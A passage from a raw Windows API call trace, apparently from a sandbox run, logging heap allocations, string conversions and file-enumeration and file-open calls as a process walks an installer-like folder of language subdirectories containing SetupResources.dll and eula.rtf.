lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.694] AreFileApisANSI () returned 1 [0060.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.694] AreFileApisANSI () returned 1 [0060.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0060.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0060.694] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.695] GetFileType (hFile=0x420) returned 0x1 [0060.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.695] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.695] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.695] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.695] CloseHandle (hObject=0x420) returned 1 [0060.695] AreFileApisANSI () returned 1 [0060.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0060.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0060.696] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.696] GetFileType (hFile=0x420) returned 0x1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.696] CloseHandle (hObject=0x420) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.697] AreFileApisANSI () returned 1 [0060.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0060.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0060.697] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.697] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x468a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0060.697] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.839] AreFileApisANSI () returned 1 [0060.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036", lpUsedDefaultChar=0x0) returned 27 [0060.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0060.839] AreFileApisANSI () returned 1 [0060.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036") returned 27 [0060.839] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036" (normalized: "c:\\588bce7c90097ed212\\1036"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.839] GetLastError () returned 0x5 [0060.839] GetLastError () returned 0x5 [0060.839] SetLastError (dwErrCode=0x5) [0060.839] GetLastError () returned 0x5 [0060.839] SetLastError (dwErrCode=0x5) [0060.840] GetLastError () returned 0x5 [0060.840] SetLastError (dwErrCode=0x5) [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.840] AreFileApisANSI () returned 1 [0060.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036") returned 27 [0060.840] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036" (normalized: "c:\\588bce7c90097ed212\\1036"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.840] GetLastError () returned 0x5 [0060.840] GetLastError () returned 0x5 [0060.840] SetLastError (dwErrCode=0x5) [0060.840] GetLastError () returned 0x5 [0060.840] SetLastError (dwErrCode=0x5) [0060.840] GetLastError () returned 0x5 [0060.840] SetLastError (dwErrCode=0x5) [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.841] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1037", cAlternateFileName="")) returned 1 [0060.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.841] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.841] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.841] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0060.842] HeapFree (in: hHeap=0x20000, 